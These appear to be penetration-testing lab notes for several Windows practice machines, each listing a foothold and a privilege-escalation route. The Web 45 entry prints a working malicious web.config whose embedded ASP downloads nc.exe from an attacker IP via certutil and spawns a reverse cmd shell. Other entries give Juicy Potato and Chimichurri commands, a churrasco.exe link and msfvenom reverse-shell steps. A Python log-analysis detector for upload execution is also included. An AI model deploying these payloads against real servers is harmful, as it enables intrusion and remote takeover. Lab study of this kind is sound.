
Web 5

Web 41: Adobe ColdFusion 8

Target: Windows Server 2008 R2 Standard

Foothold: Unauthenticated File Upload

  • Unauthenticated file upload vulnerability with the upload.cfm script.
  • Exploit DB entry: 50057
  • The Python script auto-generates a msfvenom .jsp web shell, uploads it and executes it

Privilege Escalation: MS10-059

.\Chimichurri.exe <kali-ip> <kali-tcp-port>

Web 42: WebDAV RCE

Target: Windows Server 2003

Foothold: CVE-2017-7269

Privilege Escalation: Token Impersonation

  • IIS Server has SeImpersonate which allows token impersonation
  • This exploit works perfectly for the target operating system: https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
  • Transfer the exploit
  • Transfer a msfvenom reverse shell payload
  • Start a listener and use the exploit to run the reverse shell payload as SYSTEM

Web 43: Custom API

Target: Windows 10 Pro 1903

Foothold: Sensitive Information Leak

  • Unauthenticated user can issue a POST request to the API
  • Has an API endpoint which returns running processes
  • Reveals command line parameters
  • One of the command-line parameters is a base64-encoded username and password
  • This provides SSH access to the target

Privilege Escalation: Command Execution via Privileged Web Server

  • Enumerating running ports reveals an internal server on TCP/80
  • Also found a password-protected PDF with a weak password
    • Cracked with pdf2john and john
    • Revealed information about command execution via the web server
  • Port forward to the local server and test it out
    • curl http://localhost:8080/?whoami
    • Running as SYSTEM
  • Use privileged web server to add SSH user to local admins group
    • Log out of SSH and log back in
    • Use psexec -s cmd.exe to get SYSTEM shell

Web 44: XAMPP PHP Include RFI

Target: Windows 10 Pro Build 19042

Foothold: PHP RCE via RFI

Privilege Escalation: Privileged Scheduled Task

  • A task running as SYSTEM loads a file in a world-readable directory
  • Create a msfvenom payload and overwrite the task binary
  • Start a listener
  • Catch SYSTEM shell when task runs

Web 45: IIS File Upload Vulnerability

Target: Windows Server 2008 R2 x64

Foothold: ASP Code RCE via File Upload

  • Vulnerable server allows upload of .config file
  • Files are uploaded to globally readable directory /uploadedfiles/
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("cmd.exe /c certutil.exe -urlcache -split -f http://10.10.14.6/nc.exe C:\Windows\Temp\nc.exe")
objShell.Exec("cmd.exe /c C:\Windows\Temp\nc.exe 10.10.14.6 443 -e C:\Windows\System32\cmd.exe")
%>
  • Host nc.exe via Python web server
  • Load web.config file: http://server-ip/uploadedfiles/web.config
  • File is downloaded from attack box and payload is run
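A defender-side check for the upload-then-request chain above, added here as an example that is not part of the original notes: it parses IIS W3C access log lines (constructed for this example), flags any 200 response for a .config/.asp-type file under /uploadedfiles/, and records whether the same client POSTed an upload shortly before. The FIELDS order, the extension list and the sample addresses are assumptions.

```python
"""Flag executable files served from an upload directory in IIS W3C logs.
Added example, not from the notes; sample log, upload path and extension list
are constructed assumptions."""
from datetime import datetime, timedelta

# Extensions IIS should never execute from a user-writable directory.
EXECUTABLE_EXTS = {".config", ".asp", ".aspx", ".ashx", ".asmx", ".soap"}
UPLOAD_DIRS = ("/uploadedfiles/",)  # upload location named in the notes
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status",
          "sc-substatus", "sc-win32-status", "time-taken"]

def parse_w3c(lines):
    """Yield one dict per request; skip '#' directives and malformed rows."""
    for line in lines:
        parts = line.split()
        if not parts or parts[0].startswith("#") or len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}",
                                      "%Y-%m-%d %H:%M:%S")
        yield rec

def find_upload_execution(lines, window=timedelta(minutes=10)):
    """200 responses for executable files under an upload dir, each marked
    with whether the same client POSTed (uploaded) within `window` before."""
    records = list(parse_w3c(lines))
    hits = []
    for r in records:
        stem = r["cs-uri-stem"].lower()
        ext = "." + stem.rsplit(".", 1)[-1] if "." in stem else ""
        if (not stem.startswith(UPLOAD_DIRS) or ext not in EXECUTABLE_EXTS
                or r["sc-status"] != "200"):
            continue
        posted = any(p["cs-method"] == "POST" and p["c-ip"] == r["c-ip"]
                     and timedelta(0) <= r["ts"] - p["ts"] <= window
                     for p in records)
        hits.append({"client": r["c-ip"], "path": r["cs-uri-stem"],
                     "prior_upload": posted})
    return hits

# Constructed sample: an upload, then the uploaded web.config is requested,
# plus a benign PDF download and a 404 that should both stay quiet.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-01-01 12:00:00 10.0.0.5 POST /upload.aspx - 80 - 10.0.0.99 curl/7.88 200 0 0 15
2024-01-01 12:00:05 10.0.0.5 GET /uploadedfiles/web.config - 80 - 10.0.0.99 curl/7.88 200 0 0 130
2024-01-01 12:00:09 10.0.0.5 GET /uploadedfiles/report.pdf - 80 - 10.0.0.42 Mozilla/5.0 200 0 0 3
2024-01-01 12:01:00 10.0.0.5 GET /uploadedfiles/shell.aspx - 80 - 10.0.0.42 Mozilla/5.0 404 0 2 1
""".splitlines()
```

Running `find_upload_execution(SAMPLE_LOG)` returns a single hit for the web.config request from 10.0.0.99 with `prior_upload` set, which is the pairing worth alerting on; the same rule applied to real logs should be combined with a request-filtering rule that denies `.config` in upload paths in the first place.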

Privilege Escalation: SeImpersonatePrivilege

  • User has impersonate privilege
  • Windows Server 2008 R2 is vulnerable to Juicy Potato
  • Create an msfvenom privilege escalation payload
  • Download Juicy Potato binary
  • Host both via Python web server and transfer to target
  • Run Juicy Potato
set clsid={4991d34b-80a1-4291-83b6-3328366b9097}
.\jp.exe -p C:\Users\merlin\Desktop\privesc.exe -l 4000 -t * -c %clsid%